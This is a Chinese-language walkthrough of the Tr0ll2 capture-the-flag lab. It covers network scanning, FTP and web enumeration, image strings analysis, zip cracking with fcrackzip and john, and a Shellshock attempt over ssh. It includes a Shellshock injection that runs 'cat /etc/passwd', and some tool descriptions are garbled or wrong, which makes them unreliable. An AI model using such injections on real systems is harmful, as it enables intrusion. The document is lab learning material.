上来时经典的nmap扫面网段

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.199.0/24               
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-23 11:06 CST
Nmap scan report for 192.168.199.1
Host is up (0.00019s latency).
Not shown: 999 filtered tcp ports (no-response)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH for_Windows_9.5 (protocol 2.0)
MAC Address: 00:50:56:C0:00:08 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 11 (89%)
Aggressive OS guesses: Microsoft Windows 11 21H2 (89%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.19 ms 192.168.199.1

Nmap scan report for 192.168.199.2
Host is up (0.00021s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
53/tcp filtered domain
MAC Address: 00:50:56:E5:A4:9F (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized
Running: VMware Player
OS CPE: cpe:/a:vmware:player
OS details: VMware Player virtual NAT device
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.21 ms 192.168.199.2

Nmap scan report for 192.168.199.132
Host is up (0.0031s latency).
Not shown: 997 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 2.0.8 or later
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 82:fe:93:b8:fb:38:a6:77:b5:a6:25:78:6b:35:e2:a8 (DSA)
|   2048 7d:a5:99:b8:fb:67:65:c9:64:86:aa:2c:d6:ca:08:5d (RSA)
|_  256 91:b8:6a:45:be:41:fd:c8:14:b5:02:a0:66:7c:8c:96 (ECDSA)
80/tcp open  http    Apache httpd 2.2.22 ((Ubuntu))
|_http-server-header: Apache/2.2.22 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:0F:F4:68 (VMware)
Device type: general purpose
Running: Linux 2.6.X|3.X
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
OS details: Linux 2.6.32 - 3.10
Network Distance: 1 hop
Service Info: Host: Tr0ll; OS: Linux; CPE: cpe:/o:linux:linux_kernel

可以看到靶机的ip是192.168.199.132,开放了21,22,80端口

访问80端口是这个东西

这里说明了 作者是tr0ll,而且可以看到开放了21端口是一个ftp

ftp链接,账号密码都是tr0ll,进去看一下

里面有一个lmao.zip文件,下载下来看看

后台dirb一下靶机ip,发现有robots.txt

wget下载下来,然后dirb扫描发现开放

几个页面访问下来都是一样的

查看源码说是让我们抓取图片看看,wget下载下来就是

最早的项目中我们说就是分析图片的我们有三种方法

1
2
3
4
5
binwalk(路由逆向分析工具)

exiftool(图虫)

strings(识别动态库坂本指令)

strings分析得到

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
┌──(kali㉿kali)-[~/桌面/tr0ll2]
└─$ strings cat_the_troll.jpg 
JFIF
#3-652-108?QE8<M=01F`GMTV[\[7DcjcXjQY[W
)W:1:WWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW
"aq2
\vRH
sdwTi
 aDP
 aDP
\z!$
`aDc
(Q@0S
}}HQ\)
B6F@
T"8V
!\#(
u6.U
6&      QY
;.e{
hH}Q
=\x#uk
?}1,;Gd
~>znk
BP~9D
QFQHQT
D       vOE
{"yw
.&9)
Km3Q
^Ah9]*
%DGU
WUh 
:uWw
ALzO#
NO_`
F wT
s$3'
H=ev
0mwP
J,hi
nuMs[~
XSy}]F
Q{w}n=
{k{]&
Y]3P
D&ai
7+}(
jr'h
)0zZ
L!&\~T
`$3!
8]j,
K:/w.`'
~^GR
5zT)T
Rq<8
_mzN
S0=&
o&"8
;H!\M.
.l|(
fC@FO
8Yj5
f        &1
Cdb>
1<,n=
Ksbv
K       AM
j?w1
(669VNR
u%u|Pl
;Cw4d
Ps<o
rP{J
H!u-
Vcw9
)Qup=-kG+
$T3!k:~
;*iZ
wvwD
">8Z
mcc8=
IQTu
@rh8T
+sx(
kK+:
=GEZ
gugI
}wR.
-.u+
Dm3Q
+}[R
iZ{4
Xn_B
OYKH
8Hq%
 t+%s3
o=       
<CgiZ
jnavF
]mb*=
N9Z<+
kF.j
$v_I
BI%z
2\7c
:t@n~@
        .qtI
$pGd
8VVz
nQ~4
j--h
8WSs
@QEw^?
nwyA
aQ3O
XBuJm08\&
"PzJz
>%cwJ
t+7>
'h(:
]O7U
ew\\
0>!-
1=xA0A
A+eW
H `q
B1Ow
~Q4awpX=
0J<n
v&8Y
Z8$.
yS-[
2 -,
e6mh
{D c
Il-FkKv
i{j68
XL{#
*Mqhq
O\ +
Sk~B
[jmdR
Ol;I
'%jq
iZ7%
Po.d
I {-G>
        ^ah
{)V,
8]-#
g<.}
'o&Q
4F8Q
        -wC
 F>J
_mg=
i{&0
1ancNpG*
=VZ[MH
hZOtY
'=!)
Bwgq
Ws_4\2{.M
&yC*
;,?     @
g%t.
).eG`
:q+|
tA{vF
_R4+
V'E[
XKwyDOt
f>U_
6 ;+5
q/2~WB
Xi]5
tT]+_
kTm6
0W;u
+cih
Qhcv
`*0G
nD{-4/
pzw\
GkDu(
FprFAF@
2;.uG
+=\k
UN"1
khTvH
Q}Jm
ee->
k!;Z
ivc2
ZMV0
-wI<
nCO%?C
.<vI
QLON
@Si;X'
f02HP
8Jh;
gYCJ
pV}A
7U      4
]=%em;
lj\p
*/ p?E$
Look Deep within y0ur_self for the answer

look deep within y0ur_self for the answer
要你深入到这个目录进行下一步

访问,里面有一个answer.txt文件

wget下来

全是base64编码,通过base64 -d answer.txt > having_decode.txt得到解码后的

现在我们看回来哪个下载下下的lmao.zip,zip爆破的话有两种,分别是fcrackzip和zip2john

我们采用fcrackzip

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
[-u] --use-unzip使用unzip清楚错误密码

[-D] --distionary使用字典爆破

[-p] --postion设置密码的位置

[-c] --charset设置字符集

[-b] --brute-force暴力破解

[-l] --length设置密码长度

[-u] --use-unzip使用unzip清楚错误密码

[-D] --distionary使用字典爆破

[-p] --postion设置密码的位置

[-c] --charset设置字符集

[-b] --brute-force暴力破解

[-l] --length设置密码长度

John爆破文件

Docx :

你可以进入usr/share/john查看john下的文件你会发现这个东西可以爆破7z,office等等文件

对于docx这种一般都是

1
2
3
./office2john.py test.docx > docx.txt   将docx的hash值保存在docx.txt文件中

john -w=./password|txt docx.txt  爆破docx文件

Xlsx:
和docx的一样

回归正题

密码爆破出来了,

ssh链接一下

1
ssh [email protected]

要求我们输入密码,但是我们上面解压出来了一个私钥,理论上说是不需要密码直接可以登录的

1
2

chmod 400 noob

补充一下

chmod 是控制用户对文件的权限进行操作的命令

linux/unix的文件调用权限分为三级:文件所有者(owner),用户组(group),其他用户(other user)

就像是这样的

三位,第一位对应的是read读取,第二位对应的是write写入,第三个对应的是run执行

所以用二进制码就是

报错格式不对(但是教学中时报TRY MARDER LOL!Connecction to xxx.xxx.xxx.xxx closed)🤔

按照他说的是目标靶机的ssh配置有问题,他的环境变量不允许使用/bin/bash/bin/sh

shell破壳漏洞

shellshork原理

1
2
3
4
5
6
7
8
9
10
11
12
[04/14/2021 00:28] seed@ubuntu:~$ foo='() { echo "wdnmd"; } ;echo "8848";'
[04/14/2021 00:29] seed@ubuntu:~$ echo $foo
() { echo "wdnmd"; } ;echo "8848";
[04/14/2021 00:29] seed@ubuntu:~$ export foo
[04/14/2021 00:29] seed@ubuntu:~$ bash
8848
[04/14/2021 00:29] seed@ubuntu:~$ declare -f foo
foo () 
{ 
    echo "wdnmd"
}

foo原本是一个shell变量,但是在export foo使得其编程环境变量后,在子shell进程中,foo成为了一个函数,并且命令行自动执行了echo “8848”的命令

对于满足shellshock的情景,我们可以构造出一个特殊的字符串,使得字符串前面部分是空函数定义,后面是用分号隔开的恶意指令

  • 环境变量必须以(){}开始
  • 必须调用bash
  • 系统存在bash漏洞

后面看教程是`ssh [email protected] -i noob ‘(){:;}; cat /etc/passwd’

但是不知道为什么我的就是打不进去,他是

我是

所以后面就没法弹shell进行下一步操作,Troll2
,后面想看的可以看这个,满详细的